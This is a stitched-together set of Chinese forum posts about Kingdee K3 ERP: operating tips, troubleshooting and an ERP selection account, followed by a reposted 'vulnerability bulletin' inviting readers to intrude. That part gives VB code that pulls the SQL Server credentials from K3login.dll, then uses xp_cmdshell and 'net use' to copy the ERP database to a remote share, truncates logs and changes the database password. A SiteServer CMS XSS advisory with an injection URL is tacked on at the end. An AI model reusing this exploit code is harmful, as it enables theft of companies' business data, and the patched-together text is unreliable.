第一篇:K3使用心得
说明:本人是一客户,操作中有一些体会,但计算机语言知之甚少,所述内容不一定很严谨,不过应该说还比较通俗。由于相关的使用手册对操作已有说明,我这个说明与其角度不同,估且作为手册的一点补充吧。本说明主要讲如何使用,对软件问题及安装不涉及。文中涉及的不能修改、不能改变均指在操作界面不能处理。我想将这作为新手的借鉴材料,望大家提出意见和建议,包括结构性的和功能上的。本说明的顺序无规律,有点想到哪里说到哪里的感觉,其中一部分内容在论坛中与大家交流过。
一、软件安装完后,管理员首先要对中间层有一个基本的了解。中间层的密码很重要,忘了就得重装中间层;中间层菜单上有一个“系统使用情况”的功能项,这一功能项是反映某一时刻正在使用系统的情况,如果有的单位站点较少,可以通过这里看出当前使用的是哪些人,从而对使用人员进行调节,将某些未用但没有退出系统的用户强行清除掉;在系统非正常退出时,中间层还保留其信息,大家在操作时会出现“当前使用的功能与其他用户冲突”、“该数据正在调用”等提示即与此相关,这时管理员需要在中间层选定对应帐套,通过网络控制清除相关信息。中间层的主要功能是建立新帐套、备份帐套和恢复帐套,这三项基本功能大家都应该会的,需要指出的是大家在作出重大操作时,如修改数据库、测试某一功能等情况下,要先备份。对于备份大家可以使用帐套自动指备份,在你选择好路径和间隔时间后,系统会自动将帐套备份到指定的地方。自动备份要注意不要关闭,否则下一次备份中断,该功能可以在中间层关闭后独立运行,该功能运行时,显示器右下角会有一个相应的图标。中间层还有注册帐套和取消注册帐套两个功能项。我是这样理解的,取消注册帐套类似于临时禁用了该帐套,要恢复时只须注册该帐套即可,这在需要暂时停止某一帐套,同时其他帐套正常使用情况下时适用。如果确实不需要某一帐套了,则使用帐套删除。
系统默认administrator这一用户为管理员,其权限最大。管理员可以在中间层修改其密码,也可以在进入K3系统主控台时修改。管理员对这两个地方一般很熟悉,但一般操作员对更改密码并不熟悉。对于操作员只能在进入主控台时更改密码,方法为:双击K3快捷方式图标后,在主控台处录入自已的用户和密码,不要点击确定,这时点击主控台左上角的修改密码,修改完成后须录入新密码才能进行系统。
二、进入K3主界面后,菜单上的“设置--主控台编辑”是以所设置的计算机为基础的,即某一台机器设置为特定的主控台后,其他操作员进来时都是一样的。这样大家在不熟悉的机器上如果看不到自己所需要的模块,首先要想到其主菜单的设置更改造成的。菜单上的“设置—选项”中允许多个主采单同时存在是大家用得上的。如果你大部分时间只同时使用一个系统,则不选择,如果你同时要打开多个界面,则选择此选项。
主界面下有一个“我的K3”,这一功能项可以将大家常用的几个功能项放在这里来,不论是哪个子系统的明细功能,只要设为常用功能,以后就可以直接在这里使用,不需要跨模块选择明细功能项。“我的K3”中还有一个即时消息中心,主要用于各操作员之间进行业务交流,如提醒有单据需要增加、修改或删除等,让各操作员间实现在线交流。-----此帖被gychml于2003-12-3 20:07:52修改过.故障1:K3系统在凭证过帐或是在结帐的过程中提示:与其它用户有冲突。
解决方法:
1、在客户端中点“开始——程序——金蝶K3——客户端部件——系统工具——网络控制管理”进入对应的帐套,用“清除当前任务”将多余的任务结束。
2、在服务器中进入金蝶K3中间层的帐套管理,将所有的帐做好备份!然后点“系统——系统使用状况”,用“清除当前任务”工具将多余的任务结束
故障2:为什么用户拥有仓存管理系统的管理权限,查看即时库存仍提示没有权限?
问题原因:即时库存查询属性供应链系统的公用功能,用户进行“供应链公用设置”的权限设置。
解决方法:功能权限设置高级中设置用户“供应链系统公用设置”-“即时库存”的相关权限设置。
故障3:固定资产计提减值准备如何操作?
解决方法:在固定资产“变动处理”中,选中要计提减值准备的卡片,点击“变动”,在“原值与折旧”页签录入“减值准备”保存后,在“凭证管理”对变动记录生成凭证即可。
故障4:问题描述 固定资产部分清理一定要先拆分吗?
解决方法:不一定,如果卡片上数量大于1,录入要清理数量即可;如果数量等于1,需要先拆分,再去清理.多栏账的设置。
K3系统在凭证过帐或是在结帐的过程中提示:与其它用户有冲突。在进行处理的时候不用备份帐套,因为清除清除当前任务并不影响业务数据。由于k3的产品不具备暂存功能,清除当前任务可能会导致正在输入的某些数据出错无法保存。
各位同行,本人今年参与公司ERP选型,由于各方面的因素,最终选择金蝶K3。下面我讲
讲个人心得。
1.选型的时候要多了解软件的功能,就算时间短也要进行测试,测试的方法只需要自己拟订几份订单,做几个BOM跑几遍流程基本上就可以看出效果。
2.一定要注意ERP的版本,我当时就没有了解清楚,时间也比较紧上面一直才催,所以吃了亏,原来金蝶K3是分成长版和专业版的,当出演示测试的时候他们用的是专业版,合同的时候签的是成长版,所以导致很多功能没有或者有但是做的没有那么好。所以大家以后在选择ERP的时候一定要了解清楚,不管你选的是拿款软件。
3.金蝶K3ERP总体的功能和架构上还是算可以的(专业版)一些功能考虑的比较完善,但是生产管理MRP部分却做的不是很好,他们的MRP分析是计算总需求的,不会理会订单的跟踪性,如果你要订单跟踪性(所有物料一定要与订单挂钩并且要在每个环节都能查到对应的销售订单的话,那就建议你不要使用,因为对应出来的是错的,如果出现插单的情况的话,你会发现,所对应跟踪出来的数据是错的)要求很强的话建议你不要选择。
4.所有事情都要在签合同前说清楚,不要相信软件公司所谓的多少钱一天的实施费,要在合同上写清楚包项目,并写清楚最起码他们顾问要来多少天,当然根据我4年的经验一般软件公司的顾问,他们除了熟悉他们软件以外,给不出什么可行的建议给你们的,所以不要指望能在过程当中学到什么东西,可以负责的给你们讲,如果你们熟悉他们的软件你做的比他们
好。
5、财务部分能不上的先不要上(买的时候也先不要买),等其他模块都做好以后才上财务部分,不要相信软件公司说的3个月内能够做好,那都是鬼话。前面的做好以后再和财务部的相关人员相量什么时候上财务部分。
附件中是我们公司选择的模块和实施价格,上面的价格按我个人想法可以再减2万但是我们公司上面没有想谈价格的意思,所以我只是给他们讲了下,没有强力的压他们价格。另外大家在选着站点的时候要生产管理部分的要多选几个一般要10个以上比较合适。我就是当初选了5个后来发现少了,不够用。我们公司固定电脑100台,全公司有1千人,个人觉得类
似我们公司规模的都可以参考。
金蝶2000版7.0,我使用好几年了,作为单机版,感觉功能很全,一般中小型企业及行政事业单位用起来绰绰有余,近来,我在新建财务报表、过账时,却发现了几个小问题:希望各位同仁能帮帮我,如你有什么问题的话,我也可以尽可能的帮你哟.一.报表公式:不能用函数,造成取数困难;二.现金流量表不能用,尽管软件提供了菜单,可是不能使用;三.不能反过账,要想回到上期的账套,只有恢复在过账时做的备份;四.我最觉得好用的还是该软件的“工资”功能,类似Foxpro的处理方法和习惯,让人用起来得心应手.比起从网上下的工资软件,方便多了.我单位从2001年开始启用金蝶K3系统,包括总账、固定资产、现金流量、报表系统等其他模块。成本管理、物流管理软件是自行开发的,包括销售管理、仓储管理、进出口业务管理等软件,自行开发软件是满足目前的需要,等时机成熟,还是要改用标准化软件的。初始化工作及软件调整工作方面的压力是挺大的,但完成之后,感觉操作挺方便的,工作质量有了很大提高。没用过用友软件,所以无法作出比较。
5月5号网站漏洞公告!!
金蝶K3出现严重安全漏洞,黑客可轻易读取数据库所有信息
想入侵的朋友赶紧速度了
估计其他ERP软件里也不少类似的东西,有兴趣的同学可以跟一下。转载开始。
这个漏洞在K3 各个版本都存在并且一样,包括新发版的K3 V12的3个版本。主要数据安全漏洞描述如下:
最大的安全漏洞在K3login.dll这个控件上,,它能明文显示K3 ERP数据库的密码等信息,这是非常危险的,简单VB6.0代码如下:
Dim k3lg As New k3Login.ClsLogin If k3lg.CheckLogin Then ‟如果成功登录,执行下面语句 Msgbox k3lg.PropsString End If 运行上述代码后,会弹出对话框,显示所有SQL数据库信息
你们看看,客户的ERP 数据库安全是不是全部暴露出来了,这是致命的漏洞,一个企业的所有商业机密都在这个数据库中,如该数据库泄露出去,对企业的影响是致命的。由于K3 ERP的这个漏洞,网管完全不知道数据库是如何泄露的(没有采用黑客攻击等非法手段,只是利用金蝶ERP软件安全设计漏洞),这些漏洞金蝶集团的开发人员提供的建议是(K3X经理提供的建议):采用WINDOWS模式认证即可避免此漏洞,请各位修改认证方式,避免企业内部数据丢失!
K3 ERP登录留下密码痕迹漏洞,适合所有版本:当用户通过登录界面登录ERP后,会将登录信息写入注册表中,包括服务器名称、登录密码、用户名称等等,因此该注册表就泄露了所有在计算机中登录用户的信息,其加密方式太简单,只要几次枚举方式就可PJ,通过数学知识,如等差数列等规律,轻而易举地将用户密码PJ,你们研究加密算法的人自己去看看规律,应对方法:因此用户最好定期清除注册表的登录痕迹,防止用户密码泄露。
利用金蝶ERP软件中KDLOGIN.dll漏洞 远程备份服务器中ERP数据库代码如下(VB): Public k3lg As New k3Login.ClsLogin Public cnn As New ADODB.Connection Public i As Integer Public j As Integer Public K As Integer Public S As Integer Public cnnstr As String Public databsnm As String Public Sub Main()On Error Resume Next If k3lg.CheckLogin Then i = InStr(k3lg.PropsString, “{“)j = InStr(k3lg.PropsString, “}”)
cnnstr = Mid(k3lg.PropsString, i + 1, j – i – 1)For K = 0 To Len(cnnstr)– 1 If Left(Right(cnnstr, K), 1)= “=” Then databsnm = Right(cnnstr, K – 1)Exit For End If Next K F001主窗口.帐套名称 = k3lg.AcctName F001主窗口.Show End If End Sub Public Sub 备份数据库(ByVal beifsjk As String)Screen.MousePointer = 13 Set cnn = New ADODB.Connection cnn.CommandTimeout = 0 cnn.Open cnnstr cnn.BeginTrans On Error GoTo cnn_err: Dim fy As String Dim fy001 As String Dim fy002 As String Dim jsj As String Dim yhu As String Dim mima As String Dim wenjian As String jsj = F001主窗口.计算机名称.Text wenjian = F001主窗口.文件夹.Text mima = F001主窗口.用户密码.Text yhu = F001主窗口.用户名称.Text fy = “exec master..xp_cmdshell‟net use z: ” & jsj &”-:special:1:-& wenjian & “ ” & mima & “ /user:”& jsj & “-:special:1:-& yhu & “„”
fy001 = “backup database ” & databsnm & ” to disk=‟z:-:special:1:-& beifsjk & ” „”
fy002 = “exec master..xp_cmdshell „net use z: /delete‟ ” cnn.Execute fy cnn.Execute fy001 cnn.Execute fy002 cnn.CommitTrans cnn.Close Set cnn = Nothing Screen.MousePointer = vbDefault MsgBox “数据库: ” & databsnm & ” 成功备份为: ” & beifsjk, vbInformation, “提示”
Exit Sub cnn_err: cnn.RollbackTrans cnn.Close Set cnn = Nothing Screen.MousePointer = vbDefault MsgBox Err.Description, vbInformation, “错误提示” End Sub Public Sub 清除日志()Screen.MousePointer = 13 Set cnn = New ADODB.Connection cnn.CommandTimeout = 0 cnn.Open cnnstr cnn.BeginTrans On Error GoTo cnn_err: Dim fy As String Dim fy001 As String Dim fy002 As String fy = “dump transaction ” & databsnm & ” with truncate_only”
fy001 = “backup log ” & databsnm & ” with truncate_only”
fy002 = “dbcc shrinkdatabase(” & databsnm & “)” cnn.Execute fy cnn.Execute fy001 cnn.Execute fy002 cnn.CommitTrans cnn.Close Set cnn = Nothing Screen.MousePointer = vbDefault MsgBox “数据库: ” & databsnm & “日志成功清除!”, vbInformation, “提示”
Exit Sub cnn_err: cnn.RollbackTrans cnn.Close Set cnn = Nothing Screen.MousePointer = vbDefault MsgBox Err.Description, vbInformation, “错误提示” End Sub Public Sub 修改数据库密码函数()Screen.MousePointer = 13 Set cnn = New ADODB.Connection cnn.CommandTimeout = 0 cnn.Open cnnstr cnn.BeginTrans On Error GoTo cnn_err: Dim fy As String fy = “exec sp_password ” & “„” & F002数据库密码修改.输入旧密码 & “„”& “,” & “„” & F002数据库密码修改.新密码确认.Text & “„” cnn.Execute fy cnn.CommitTrans cnn.Close Set cnn = Nothing Screen.MousePointer = vbDefault MsgBox “数据库密码成功修改!”, vbInformation, “提示”
Exit Sub cnn_err: cnn.RollbackTrans cnn.Close Set cnn = Nothing Screen.MousePointer = vbDefault MsgBox Err.Description, vbInformation, “错误提示” End Sub =============== SiteServer CMS存在多处跨站漏洞
影响版本: SiteServer CMS 3.3.9
程序介绍: SiteServer CMS 网站内容管理系统是定位于中高端市场的CMS内容管理系统,能够以最低的成本、最少的人力投入在最短的时间内架设一个功能齐全、性能优异、规模庞大的网站平台
漏洞分析:
程序因register.aspx等多个页面过滤不严导致跨站脚本攻击漏洞
漏洞利用:
1.注册页面为过滤用户提交非法参数导致跨站,插入跨站语句即可: http://demo.siteserver.cn/usercenter/register.aspx?ReturnUrl=">[XSS] 2.进入用户管理节目后,个人签名以及空间描述插入跨站语句均可导致跨站漏洞 post: